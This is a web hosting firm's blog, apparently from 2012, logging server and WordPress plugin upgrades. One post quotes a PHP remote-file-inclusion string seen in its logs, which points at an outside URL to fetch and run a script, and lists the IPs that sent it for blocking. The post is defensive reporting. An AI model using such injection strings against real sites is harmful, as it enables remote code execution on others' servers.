Gossamer's Lake Tahoe Web Design

Several packages updates were received overnight and applied today. They include:

• freetds-msdblib -> (port has 0.64_8,1)
• libvorbis -> (port has 1.3.3,3)
• p5-Log-Log4perl -> (port has 1.35)
• p5-Module-CoreList -> (port has 2.60)
• pciutils -> (port has 3.1.9)
• unixODBC -> (port has 2.3.1)

We have upgraded the following WordPress plugins:

• Fast Secure Contact Form – Version 3.1.3.1
• IDX Broker -Version 1.5.1
• wp-forecast – Version 0.4.3

We have completed a number of new package upgrades to our web hosting servers. The following upgrades were installed:

• libXaw -> port 1.0.8,2
• libXt -> port has 1.0.9,1
• pixman ->port has 0.24.2
• xorg-macros ->port has 1.16.1

We have also removed a few deprecated packages and re-compiled dependencies:

• libltdl-2.2.10 – rebuilt p5-Mail-ClamAV
• p5-Catalyst-Log-Log4perl-1.05
• p5-DBIx-Class-Validation-0.02005
• p5-FormValidator-Simple-0.28
• p5-HTML-Widget-1.11_2
• p5-IO-Socket-INET6-2.65

A number of popular web packages are based on PHP. PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Popular content management systems like WordPress are written in PHP.

It is very important that this base layer software package be maintained up to date. I am always amazed at some of my competitors that claim they have written the best most easy to use CMS for your website, and when you look, you find that they are using a base PHP installation that is years old and full of security flaws.

The latest security fix for PHP was released on Feb 2, 2012 and we installed the upgrade on our web hosting servers this morning. This included the following PHP modules:

• php5-5.3.10
• php5-bcmath-5.3.10
• php5-bz2-5.3.10
• php5-calendar-5.3.10
• php5-ctype-5.3.10
• php5-curl-5.3.10
• php5-dba-5.3.10
• php5-dom-5.3.10
• php5-exif-5.3.10
• php5-filter-5.3.10
• php5-ftp-5.3.10
• php5-gd-5.3.10
• php5-gettext-5.3.10
• php5-hash-5.3.10
• php5-iconv-5.3.10
• php5-imap-5.3.10
• php5-json-5.3.10
• php5-mbstring-5.3.10
• php5-mcrypt-5.3.10
• php5-mssql-5.3.10
• php5-mysql-5.3.10
• php5-mysqli-5.3.10
• php5-openssl-5.3.10
• php5-pdo-5.3.10
• php5-pdo_mysql-5.3.10
• php5-pdo_sqlite-5.3.10
• php5-pgsql-5.3.10
• php5-phar-5.3.10
• php5-posix-5.3.10
• php5-session-5.3.10
• php5-simplexml-5.3.10
• php5-soap-5.3.10
• php5-sqlite-5.3.10
• php5-sqlite3-5.3.10
• php5-tidy-5.3.10
• php5-tokenizer-5.3.10
• php5-xml-5.3.10
• php5-xmlreader-5.3.10
• php5-xmlwriter-5.3.10
• php5-zip-5.3.10
• php5-zlib-5.3.10

So the next somebody tries to sell you on their hosting plan, or their “homegrown” CMS system, ask them a simple question. “What version of PHP are they running?” If they do not keep up to date, then give us a call for the most reliable web hosting money can buy. You deserve no less.

There is a reason that Apache is the world’s most popular web server. After receiving a very rare security warning yesterday, the fix was in and installed today. We are now running version 2.2.22.

We always keep our servers up to date to provide a robust security environment. This is in contrast to the big boys, who, once you establish an account, never upgrade the operating system software and packages. The following packages have been updated:

Bison – version 2.5.1

GMP – version 5.0.3

NSS – version 3.13.1_1

p5-DBI – version 1.617

We’ve been a bit remiss in keeping up with our numerous WordPress plugin upgrades. We work to keep these plugins up to date for the best results for our customers. The following plugins just got a facelift:

AddThis Social Bookmarking Widget – Version 2.3.1

Fast Secure Contact Form - Version 3.1.2

Google Doc Embedder – Version 2.2.3

IDX Broker – Version 1.5.0

Sociable – Version 4.2.1

Store Locator - Version 1.2.43

WPBook – Version 2.3.4

With SOPA and the new Defense Authorization Bill it seems that our government is bound and determined to monitor us for un-American activites at every corner.

You can fight back. Migrate to OpenNIC.

For complete details please visit http://opennicproject.org/start-here/51-migrate-to-opennic

Since deploying a number of WordPress sites I have noticed a number of attempted attacks targetted against PHP. While the majority of these attempts are childlike and fail there still exist the possibility that these fruitless attempts are merely feelers designed to test the security of the system.

One of the more common attempts take the form of

_SERVER[DOCUMENT_ROOT]=http://aboutav.com//o/id1.txt???

which appears to be an attempt to change a system level variable in order to run the php script contained in the supplied URL. You can view this script by plugging the URL into your browser.

Our logs indicate that these attempts result in 301 redirects to the home page or result in a 404 error. Although these attempts appear to be harmless I am obviously not too happy about them so I am actively monitoring these requests for inclusion in our Apache global deny configuration file. For your convenience I have enumerated the offending IPs in this post.

• 211.234.100.46(211.234.100.46) Korea, Republic of
• 222.122.72.216(222.122.72.216) Korea, Republic of
• 211.227.241.149(211.227.241.149) Korea, Republic of
• 61.110.18.100(61.110.18.100) Korea, Republic of
• 222.122.72.216(222.122.72.216) Korea, Republic of
• client.superb.net(207.103.6.100) United States
• 211.239.157.203(211.239.157.203) Korea, Republic of
• 204.30.3.225(204.30.3.225) United States
• 85.25.236.152(85.25.236.152) Germany
• saturn.usedns.com(78.111.80.234) Russian Federation
• 204.15.230.189(204.15.230.189) United States
• 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
• cp105.agava.net(89.108.67.95) Russian Federation
• 114.4.8.14(114.4.8.14) Indonesia
• 123.142.108.142(123.142.108.142) Korea, Republic of
• 82.195.150.228(82.195.150.228) Ireland
• correo.ccimarketplace.com(216.234.246.153) United States
• 2.sollink.net(65.18.168.84) United States
• at193.name4you.net(89.104.70.15) Russian Federation
• 117.110.59.2(117.110.59.2) Korea, Republic of
• ns.sun-nsk.ru(217.117.85.108) Russian Federation
• 72.11.145.8(72.11.145.8) United States
• 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
• 118.107.163.230(118.107.163.230) Korea, Republic of
• 211.189.18.73(211.189.18.73) Korea, Republic of
• server.cityoffers.de(62.116.137.99) Germany
• webhostp1.ascogroup.it(151.8.79.19) Italy
• nostromo.blazearts.hu(81.2.253.202) Hungary
• host.prodimark.com(74.200.89.25) United States
• client.superb.net(207.103.6.100) United States
• 74.223.143.131.nw.nuvox.net(74.223.143.131) United States
• www.ebel.com.br(204.3.129.73) United States
• 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
• 212186220246.teleweb.at(212.186.220.246) Austria
• sded3.atcihosting.com(206.225.23.4) United States
• 74.50.85.104(74.50.85.104) United States
• 211.75.220.49(211.75.220.49) Taiwan
• linhost01.turknetserver.com(193.192.122.30) Turkey
• sataweb.sata.com.sg(203.126.23.51) Singapore
• labor.allegri.unimo.it(155.185.215.15) Italy
• 59.27.95.144(59.27.95.144) Korea, Republic of

While these are just of few of the offending IPs, our quest to identify and eliminate them continues.

On occasion upgrading a WordPress plugin can cause trouble, notably the white screen of death. When this happens the fastest way to solve the problem is to disable all the plugins.

To do this, load up the WordPress database and locate the options table. Find the active_plugins record, record the contents, and then clear out the record.

Your WordPress site should display once again, minus your plugins. Now you can re-enable your plugins and diagnose why the misbehaving plugin screwed with ya. A quick link to this issue is at http://perishablepress.com/press/2008/02/18/quickly-disable-or-enable-all-wordpress-plugins-via-the-database/.